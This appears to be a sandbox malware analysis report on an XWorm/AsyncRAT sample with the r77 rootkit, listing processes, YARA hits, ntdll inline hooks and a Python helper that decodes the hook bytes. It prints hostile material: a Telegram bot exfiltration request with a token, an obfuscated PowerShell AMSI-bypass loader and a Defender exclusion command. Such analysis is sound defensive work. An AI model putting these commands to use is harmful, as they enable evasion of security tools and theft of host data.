Data:
GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Timestamp: 2024-12-14 17:53:48 UTC
Bytes transferred: 346
Direction: IN
Data:
HTTP/1.1 400 Bad Request
Server: nginx/1.18.0
Date: Sat, 14 Dec 2024 17:53:48 GMT
Content-Type: application/json
Content-Length: 56
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2024-12-14 17:53:48 UTC
Bytes transferred: 56
Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                                Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
ZwResumeThread | INLINE | explorer.exe, winlogon.exe
NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
NtResumeThread | INLINE | explorer.exe, winlogon.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
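The hook table above records user-mode inline hooks: the first bytes of each listed ntdll export were overwritten, and every patch begins with 0xE9, the opcode of a 5-byte JMP rel32, so each call is diverted into the rootkit's code before the real syscall stub runs. Nt* and Zw* names are aliases of the same export in user-mode ntdll, which is why each pair shows byte-identical new data, and the report shows RtlGetNativeSystemInformation patched identically to NtQuerySystemInformation. The Python below is an added example and not part of the Joe Sandbox report: it parses the flattened rows (copied from the table), decodes the displacement of each JMP and groups the hooked functions by patch. The "purpose" labels are the usual reason a user-mode rootkit hooks each call, not something the report states, and the function address passed to jmp_target is a hypothetical value because the report gives none.

```python
"""Decode the INLINE hook rows of the sandbox report (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Rows as the report prints them, flattened as "<name>INLINE<bytes>" (copied from the table).
HOOK_ROWS = [
    "ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF",
    "NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF",
    "ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F",
    "NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F",
    "ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F",
    "NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF",
    "NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF",
    "ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F",
    "ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF",
    "NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F",
    "RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF",
    "NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF",
    "NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F",
    "ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF",
    "ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF",
]

# The report only shows INLINE hooks, so a row is <name>INLINE<space-separated hex bytes>.
_ROW = re.compile(r"^(?P<name>\w+?)(?P<type>INLINE)(?P<data>(?:0x[0-9A-Fa-f]{2}\s*)+)$")

# Typical reason a user-mode rootkit hooks each call (general knowledge, not stated by the report).
PURPOSE = {
    "QueryDirectoryFile": "hide files and directories from directory listings",
    "QueryDirectoryFileEx": "hide files and directories from directory listings",
    "EnumerateKey": "hide registry keys",
    "EnumerateValueKey": "hide registry values",
    "QuerySystemInformation": "hide processes from process enumeration",
    "ResumeThread": "intercept newly created processes before their first instruction runs",
    "DeviceIoControlFile": "filter device I/O control requests (used by r77-style rootkits to hide network connections)",
}


@dataclass(frozen=True)
class Hook:
    function: str
    hook_type: str
    new_data: bytes


def parse_row(row: str) -> Hook:
    """Split one flattened table row into (function, hook type, patch bytes)."""
    m = _ROW.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised hook row: {row!r}")
    data = bytes(int(tok, 16) for tok in m.group("data").split())
    return Hook(m.group("name"), m.group("type"), data)


def jmp_rel32(data: bytes) -> Optional[int]:
    """Signed rel32 of an E9 JMP, or None if the patch does not start with a JMP rel32.
    The sixth byte the report shows lies beyond the 5-byte jump and is ignored."""
    if len(data) >= 5 and data[0] == 0xE9:
        return int.from_bytes(data[1:5], "little", signed=True)
    return None


def jmp_target(function_address: int, data: bytes) -> Optional[int]:
    """Absolute detour target: JMP rel32 is relative to the end of the 5-byte instruction."""
    rel = jmp_rel32(data)
    return None if rel is None else (function_address + 5 + rel) & 0xFFFF_FFFF_FFFF_FFFF


def stem(function: str) -> str:
    """Strip the Nt/Zw prefix so aliases of one export share a key; the report shows
    RtlGetNativeSystemInformation patched identically to NtQuerySystemInformation."""
    if function == "RtlGetNativeSystemInformation":
        return "QuerySystemInformation"
    return re.sub(r"^(Nt|Zw)", "", function)


def group_by_patch(hooks: List[Hook]) -> Dict[bytes, List[str]]:
    """Functions that received byte-identical patches, i.e. the same export address."""
    groups: Dict[bytes, List[str]] = {}
    for h in hooks:
        groups.setdefault(h.new_data, []).append(h.function)
    return groups


def summarize(rows: List[str] = HOOK_ROWS) -> List[Dict[str, object]]:
    """One entry per distinct patch: the aliases it covers, its rel32 and the likely purpose."""
    hooks = [parse_row(r) for r in rows]
    out = []
    for patch, names in group_by_patch(hooks).items():
        out.append({
            "functions": sorted(names),
            "patch": patch.hex(" "),
            "rel32": jmp_rel32(patch),
            "purpose": PURPOSE.get(stem(names[0]), "unknown"),
        })
    return out


if __name__ == "__main__":
    for entry in summarize():
        print(entry)
```

A decoded displacement is only meaningful together with the hooked function's load address in that process, which the report does not print. To confirm a hook independently of the sandbox, compare the first bytes of each export in the loaded ntdll against the same export in the on-disk image: an 0xE9 where the clean copy has the syscall stub prologue is the signature this table is showing.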

                                                                                                                                Target ID:0
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\RdLfpZY5A9.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\RdLfpZY5A9.exe"
                                                                                                                                Imagebase:0x600000
                                                                                                                                File size:265'216 bytes
                                                                                                                                MD5 hash:28DB4677DCBBAA0A4C5ADBC02C9DA4F3
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\ProgramData\Install.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Install.exe"
                                                                                                                                Imagebase:0x7c0000
                                                                                                                                File size:165'888 bytes
                                                                                                                                MD5 hash:B5F6C9AC3389F5E61B4C750CF950E27C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000002.00000000.1404083892.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: C:\ProgramData\Install.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\ProgramData\KrnlSetupSus.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\ProgramData\KrnlSetupSus.exe"
                                                                                                                                Imagebase:0xbc0000
                                                                                                                                File size:87'040 bytes
                                                                                                                                MD5 hash:6435792D63BE630506EB9EEBBD1E3878
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: ditekSHen
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Target ID:4
                                                                                                                                Start time:12:53:00
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+'e'+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qnwSIaibfbWlFcLLMVH=zDgZeIZuxWRL @([String])([IntPtr]);$MmSYyEqPQkjxSlmVVTEznD=zDgZeIZuxWRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$saKjRLExuCO=$ysqdxYMCHCLNa.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lUrimOjxLHSAgu=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('L'+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$BgYJLHVZjDSQrMGil=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kIpEHaJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+'uf'+[Char](102)+''+[Char](101)+'r')));$MjFQYglbdB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,4,[ref]$MjFQYglbdB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rLMnIHfZQPDuCMOEo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,0x20,[ref]$MjFQYglbdB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000004.00000002.1499817567.000001A84BCC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:12:53:01
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\dllhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
                                                                                                                                Imagebase:0x7ff673080000
                                                                                                                                File size:21'312 bytes
                                                                                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\winlogon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:winlogon.exe
                                                                                                                                Imagebase:0x7ff6cc5a0000
                                                                                                                                File size:906'240 bytes
                                                                                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
Has exited: false

Target ID: 8
Start time: 12:53:05
Start date: 14/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 12:53:05
Start date: 14/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 12:53:06
Start date: 14/12/2024
Path: C:\Windows\System32\lsass.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\lsass.exe
Imagebase: 0x7ff6b5fa0000
File size: 59'456 bytes
MD5 hash: A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 11
Start time: 12:53:06
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 12
Start time: 12:53:07
Start date: 14/12/2024
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff7751a0000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 13
Start time: 12:53:10
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 15
Start time: 12:53:10
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 16
Start time: 12:53:11
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 17
Start time: 12:53:11
Start date: 14/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
